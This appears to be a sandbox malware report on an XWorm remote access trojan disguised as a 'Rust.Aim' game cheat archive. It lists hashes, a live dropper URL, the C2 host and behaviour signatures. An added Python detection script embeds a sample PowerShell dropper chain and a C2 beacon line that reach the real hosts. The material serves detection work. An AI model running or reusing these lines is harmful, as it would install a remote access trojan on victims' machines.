General

  • Target

    Rust.Aim.rar

  • Size

    911B

  • Sample

    241108-bzm34svldp

  • MD5

    0ce5ecd49596d10453ecb7dc612e5d3a

  • SHA1

    33c45a404a32d71a689f923873333c7cb3930c4b

  • SHA256

    5e83047d8407d37fbe2ad843c7844d0d6189adc107988b389ce1fa9f9c508748

  • SHA512

    cfa9d98d909c2924d904a74ff2c6d37c3496e3ca39bceb0efb11b69c041bb3c5763d4d530d6f2cb63621a5e140b7f13d6d38d0c4261aa09f26a5c63a4a3752b8

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • exe.dropper

    https://github.com/Mohmmmasdasd/asdas/raw/refs/heads/main/Windows.Security.exe

Extracted

Family

xworm

C2

here-thinking.gl.at.ply.gg:50161

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    WindowsSecurity.exe

Targets

    • Target

      Rust.Aim/First.ps1

    • Size

      1KB

    • MD5

      355758fa44771365dfe136f62ad45d7b

    • SHA1

      6201b4545c3593ab65d49d41609ac722166a6563

    • SHA256

      ec083e27ff17a38cba680f48e6468cbdadb4ee45561f58b8a941cc3452c9ac11

    • SHA512

      3cbecf52f2132398ae72e7ad074a6f4bb69dabc2666e07826b6b35f3853cdbb1881e8848e0fe46897496b50c9de81618865e5cdd1cb03a723ef24d9a888fd4d1

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Xworm family

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Launches powershell.exe to run the script.

    • Deletes itself

    • Drops startup file

    • Executes dropped EXE

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2

    • Target

      Rust.Aim/Start.bat

    • Size

      129B

    • MD5

      db38c6d364840c2f07293c6e126b4861

    • SHA1

      d373ea5202039fa1abde76abd7cf42757a68b431

    • SHA256

      af95ba5eb54db6ae3708b77d2f1f317fb0e723fc837ca800409554333060461e

    • SHA512

      9dcd53d90cf7a1bd9cea90ba5663734cda59266a7176421474f3f1cbdcfdba0b8a4230b14d16c68a550e88c91e5b82b9cce207025cb69eac3ebf369d4e24f6b8

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Xworm family

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to add Windows Defender exclusions for file extensions, paths, and processes.

    • Drops startup file

    • Executes dropped EXE

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2
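
The signatures above describe a short PowerShell dropper chain: fetch an executable from a GitHub raw URL, write it to %LocalAppData%\WindowsSecurity.exe, add Defender exclusions, persist through a Run key, execute it, and connect to the C2 host. The following detection sketch is an added example, not code from the report or from the sandbox: it scans PowerShell ScriptBlock (Event ID 4104) text for those behaviours and matches file hashes against the ones listed above. The C2 host, dropper URL, install file name and SHA256 values are taken from the report; the regexes, severity mapping and the sample script blocks and file inventory are constructed for the example and are not the sample's actual contents.

```python
"""Triage PowerShell script blocks and file hashes against the behaviours and
indicators in the sandbox report above. Added example, not the report's code."""
import re

# Indicators quoted from the report.
C2_HOST = "here-thinking.gl.at.ply.gg"
C2_PORT = 50161
DROPPER_URL = "https://github.com/Mohmmmasdasd/asdas/raw/refs/heads/main/Windows.Security.exe"
INSTALL_FILE = "WindowsSecurity.exe"
KNOWN_SHA256 = {
    "5e83047d8407d37fbe2ad843c7844d0d6189adc107988b389ce1fa9f9c508748": "Rust.Aim.rar",
    "ec083e27ff17a38cba680f48e6468cbdadb4ee45561f58b8a941cc3452c9ac11": "Rust.Aim/First.ps1",
    "af95ba5eb54db6ae3708b77d2f1f317fb0e723fc837ca800409554333060461e": "Rust.Aim/Start.bat",
}

# Behaviour rules. These regexes are this example's own approximations of the
# report's signature names (assumption), not patterns taken from the sandbox.
RULES = {
    "defender_exclusion": re.compile(
        r"Add-MpPreference\s+-Exclusion(?:Path|Extension|Process)\b", re.I),
    "github_raw_download": re.compile(
        r"https?://(?:raw\.githubusercontent\.com/|github\.com/[^\s'\"]+/raw/)[^\s'\"]+\.exe", re.I),
    "localappdata_drop": re.compile(
        r"(?:\$env:LOCALAPPDATA|%LocalAppData%)\\[^\s'\"]+\.exe", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run\b", re.I),
    "self_delete": re.compile(
        r"Remove-Item\s+.*?\$(?:PSCommandPath|MyInvocation\.MyCommand\.Path)", re.I),
    "known_c2": re.compile(re.escape(C2_HOST) + r"(?::" + str(C2_PORT) + r")?", re.I),
}

# Seen together in one block these form the chain the report describes:
# fetch from a code-hosting site, write under %LocalAppData%, persist via Run key.
CHAIN = {"github_raw_download", "localappdata_drop", "run_key_persistence"}


def scan_script_block(text: str) -> set[str]:
    """Return the names of every rule that matches one 4104 script block."""
    return {name for name, rx in RULES.items() if rx.search(text)}


def triage(hits: set[str]) -> str:
    """Map a hit set to a severity. A lone Defender exclusion is routine admin
    work; the full download-drop-persist chain or a known C2 string is not."""
    if "known_c2" in hits or CHAIN <= hits:
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low" if hits else "none"


def match_hashes(inventory: dict[str, str]) -> dict[str, str]:
    """inventory maps path -> sha256 hex; return paths whose hash the report lists."""
    return {path: KNOWN_SHA256[h.lower()] for path, h in inventory.items()
            if h.lower() in KNOWN_SHA256}


# Constructed sample input (not the sample's real script content).
ADMIN_BLOCK = r"Add-MpPreference -ExclusionPath 'C:\Build\Artifacts'"
DROPPER_BLOCK = r"""
$u = 'https://github.com/Mohmmmasdasd/asdas/raw/refs/heads/main/Windows.Security.exe'
$p = "$env:LOCALAPPDATA\WindowsSecurity.exe"
Invoke-WebRequest -Uri $u -OutFile $p
Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name WindowsSecurity -Value $p
Add-MpPreference -ExclusionPath $p -ExclusionProcess 'WindowsSecurity.exe'
Start-Process $p
Remove-Item $PSCommandPath -Force
"""
BEACON_BLOCK = r"$c = New-Object Net.Sockets.TcpClient('here-thinking.gl.at.ply.gg', 50161)"
INVENTORY = {
    r"C:\Users\victim\Downloads\Rust.Aim\First.ps1":
        "ec083e27ff17a38cba680f48e6468cbdadb4ee45561f58b8a941cc3452c9ac11",
    r"C:\Windows\notepad.exe": "0" * 64,  # placeholder hash, constructed
}

if __name__ == "__main__":
    for label, block in (("admin", ADMIN_BLOCK), ("dropper", DROPPER_BLOCK), ("beacon", BEACON_BLOCK)):
        hits = scan_script_block(block)
        print(f"{label:8s} {triage(hits):6s} {sorted(hits)}")
    print("hash matches:", match_hashes(INVENTORY))
```

The severity mapping is deliberately coarse: a single Add-MpPreference call is common in build and EDR tuning scripts, so it scores low on its own, while the three-step chain or the C2 host string scores high regardless of what else is present. Swap the constructed blocks for real 4104 events (the ScriptBlockText field) to run it over an export.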

MITRE ATT&CK Enterprise v15
